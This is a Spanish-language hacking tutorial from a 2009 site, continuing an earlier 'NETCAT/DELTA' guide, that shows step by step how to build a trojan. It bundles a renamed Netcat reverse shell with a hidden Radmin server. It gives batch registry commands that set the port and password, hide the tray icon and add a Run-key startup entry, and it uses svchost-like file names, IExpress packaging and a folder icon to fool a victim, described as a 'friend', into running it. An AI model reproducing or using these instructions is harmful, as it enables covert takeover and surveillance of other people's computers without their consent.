Última actualización: martes, 24 febrero 2009 15:30:19
Menú principal - Tutoriales > DELTA/TANGO
Haz un poco de memoria
Si te gustó el tutorial NETCAT/DELTA estoy seguro de que éste también va a ser de tu agrado. Como habrás comprobado, en el tutorial NETCAT/DELTA se explica cómo crear un programa con la ayuda de NETCAT para controlar remotamente un ordenador, sin embargo, con ese programa sólo podemos ver el contenido de archivos de texto ASCII y no podemos descargar ningún tipo de archivo. En sí el programa está muy bien ya que permite realizar muchas tareas remotamente, no obstante, no podemos descargar ni subir archivos al host remoto, y esto es una desventaja bastante considerable.
Ya puedes comenzar
Lo primero que harás será descargar la versión 2.1 del Radmin desde este enlace. Radmin es un software de control remoto igual que NETCAT, la diferencia es que Radmin permite hacer más cosas, además podrás ver la pantalla del host remoto y controlar el teclado y el ratón. Que Radmin permita hacer más cosas no significa ni que sea mejor ni peor que NETCAT, debes tener en cuenta que NETCAT ofrece reverse shell y Radmin no, pero no pasa nada ya que vas a combinar los dos, primero obtendrás la shell con NETCAT y luego desde ahí ejecutarás el servidor Radmin, evidentemente tú vas a tener que instalar el cliente en tu host. No te preocupes si no estás entendiendo nada, sólo es una pequeña introducción, ahora sí que vas a comenzar en serio.
Recapitulemos; ahora sabes muy bien qué es NETCAT y sabes asignar un nombre de dominio a tu IP, por lo tanto supongo que no vas a tener problemas para hacerlo de nuevo ya que el programa que vas a hacer funcionará exactamente igual que DELTA, quizá éste sea un poco más complicado, pero muy poco.
El primer paso es que abras un puerto en tu Router, para el NETCAT, claro. Yo utilizaré el puerto 4000. Si has seguido el tutorial NETCAT/DELTA no hará falta que te explique de nuevo cómo configurar el archivo batch para que el NETCAT se conecte a ti mediante una reverse shell, pues como no hace falta, me saltaré este paso, y en todo caso, si no sabes cómo hacerlo te recomiendo que lo consultes en el tutorial que ya sabes.
Ya tienes los dos archivos, el NETCAT: nc.exe (cámbiale el nombre) y el archivo de configuración en batch que por supuesto has convertido a ejecutable. Yo utilizaré svshost.exe para NETCAT y svvhost.exe para el ejecutable de configuración. Si tienes IP dinámica y has sido listo seguro que en el archivo de configuración has indicado un nombre de dominio asignado a tu IP en lugar de tu IP. Si tuviéramos que seguir con DELTA ahora empaquetaríamos los dos archivos y listo, pero recuerda que tenemos que añadirle el Radmin. Antes de hacerlo tenemos que configurarlo asignándole un puerto y una contraseña, entre otros parámetros que ya te contaré.
Comencemos
Ahora, si has instalado Radmin 2.1 en tu máquina, ejecuta la consola de comandos (cmd).
Ejecuta “c:\archivos de programa\radmin\r_server.exe /setup” (en el caso de que lo hayas instalado en una ubicación distinta, indícalo.)
Ahora se abrirá una ventana como la que se muestra arriba dónde vas a configurar algunas opciones del Radmin: la contraseña y el puerto de datos. Para asignar una contraseña te vas a la opción “Set password” y escribes una contraseña de por lo menos 8 caracteres. Asegúrate de que no está activada la opción “Enable NT Security” y finalmente pulsas “OK”.
Ahora te vas a “Options”, en “Port” indicas un puerto de datos, que es el que utilizará Radmin. En mi caso voy a utilizar el puerto 4002. Te recomiendo un puerto que esté por encima del 1000. También, muy importante, activa la opción “Hide Tray Icon” para que el icono del servidor Radmin no se muestre en la bandeja del sistema. Las demás opciones deben estar todas desactivadas.
Ahora el servidor Radmin ya está configurado, pero en nuestro host, ahora tienes que acceder al registro y obtener las claves que tienen la configuración del Radmin para luego indicarlas en un archivo batch.
Te vas a “Ejecutar > regedit”, luego vas a “HKEY_LOCAL_MACHINE\System\RAdmin\v2.0\Server\Parameters”
y te aparecerán varias entradas, te interesan tres:
Port (es el puerto de datos que has indicado anteriormente)
Parameter (es la contraseña que has indicado)
DisableTrayIcon (supongo que ya lo has deducido tú mismo/a)
El contenido de estas entradas varía dependiendo del puerto y la contraseña que introdujeras pero la entrada DisableTrayIcon debe contener este valor: “01000000”. Tanto en Port como en Parameter te aparecerán una serie de números y letras sin sentido, no te preocupes, lo que ocurre es que los datos de esas entradas se guardan en numeración hexadecimal (16 caracteres del 0 a la F).
¿Qué vas a hacer ahora?, pues crear un archivo batch y copiar el siguiente
código:
REG ADD HKEY_LOCAL_MACHINE\System\RAdmin\v2.0\Server\Parameters /v Port /t
REG_BINARY /d "*"
REG ADD HKEY_LOCAL_MACHINE\System\RAdmin\v2.0\Server\Parameters /v Parameter /t
REG_BINARY /d "*"
REG ADD HKEY_LOCAL_MACHINE\System\RAdmin\v2.0\Server\Parameters /v
DisableTrayIcon /t REG_BINARY /d "01000000"
REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v * /t
REG_SZ /d "C:\windows\system32\*.exe"
Los asteriscos los sustituyes por los datos que has comprobado tú en el registro. En la última clave debes sustituir el primer asterisco por el nombre que aparecerá en la entrada de inicio, yo le he puesto svchost. En el segundo pones el nombre que le vas a dar al ejecutable del Radmin (el servidor). En mi caso le he puesto scvhost.exe (para variar). Ahora te vas a “C:\Archivos de programa\Radmin” y copias los archivos r_server.exe y AdmDll.dll en la misma carpeta donde está NETCAT y su archivo de configuración. Cámbiale el nombre al ejecutable por el que le hayas puesto en el archivo batch, en mi caso era scvhost.exe. No cambies el nombre del archivo .DLL, no me seas capullo.
Ahora guarda el archivo batch de configuración del Radmin y conviértelo a ejecutable y lo sitúas en la misma carpeta que los demás. Deberías tener 5 archivos, en mi caso: svshost.exe, svvhost.exe, scvhost.exe, svzhost.exe y AdmDll.dll. El archivo svzhost.exe es el archivo de configuración del Radmin.
Ahora con el Reshack puedes cambiarle el icono al ejecutable del Radmin, yo le
dejaría el típico icono de la ventanita blanca, sí, como el de los demás, como
este:
Estos iconos suelen pasar muy desapercibidos en directorios como System32.
Ya estamos acabando, y ahora bendita sea la aplicación IExpress 2.0 Supongo que ya sabes qué vas a hacer a continuación, ¿verdad? Pues vas a “Ejecutar > iexpress”. Seamos sinceros, me jodería mucho tener que subir de nuevo todas las imágenes del IExpress para que empaquetes los archivos, así que no lo haré, me limitaré a explicártelo. Realiza todas las opciones tal y como se muestra en el capítulo 2 del tutorial NETCAT/DELTA hasta llegar al paso donde tienes que seleccionar los archivos. Primero copia los 5 archivos en “C:\WINDOWS\System32” y luego desde el IExpress los seleccionas, los 5, claro. En el siguiente paso, en la opción “Install Program” seleccionas el archivo de configuración de NETCAT, en mi caso svvhost.exe. Luego en la opción de abajo “Post Install Command” seleccionas el archivo de configuración del Radmin. Genial, estupendo, maravilloso… ahora termina con las demás opciones y asegúrate de poner un mensaje coherente, no me refiero a mensajes como “Te he jodido, esto es un troyano” o cosas por el estilo.
Bien, ahora ya tienes los 5 archivos que necesitas en un solo ejecutable. El
siguiente paso es cambiarle el icono, yo le pondría el de una carpeta. Recuerda
también limpiar la información del ejecutable, ya sabes, versión, compañía, etc.
Una vez tengas el archivo listo para enviar, abres tu consola de comandos y
ejecutas:
delta -vv -L -p 4000
Bueno, esto en mi caso, tú haces lo mismo con tu puerto y escribiendo el nombre
que le hayas dado al NETCAT que está en System32.
Ahora sólo te queda enviar el TANGO a tu amigo, sí, le he puesto TANGO ¿qué
pasa? Ahora esperar a que lo ejecute y obtendrás la shell remota. Cuando la
obtengas, te aparecerá su IP pública, cógela ya que necesitarás indicarla en tu Radmin cliente para conectarte a su sistema.
Como ya se habrá ejecutado el archivo de configuración del Radmin en su sistema,
ya podrás desde la shell remota de tu amigo ejecutar el servidor Radmin para
conectarte a él desde tu host utilizando el Radmin cliente, de la siguiente
manera:
scvhost.exe /pass:12345678 /port:4002
Los datos anteriores debes escribirlos en decimal, no se te ocurra hacerlo en hexadecimal. Ahora simplemente ejecuta tu Radmin cliente y agrega la IP que has obtenido en la reverse shell de NETCAT, conéctate y ya puedes controlar remotamente su sistema desde Radmin.
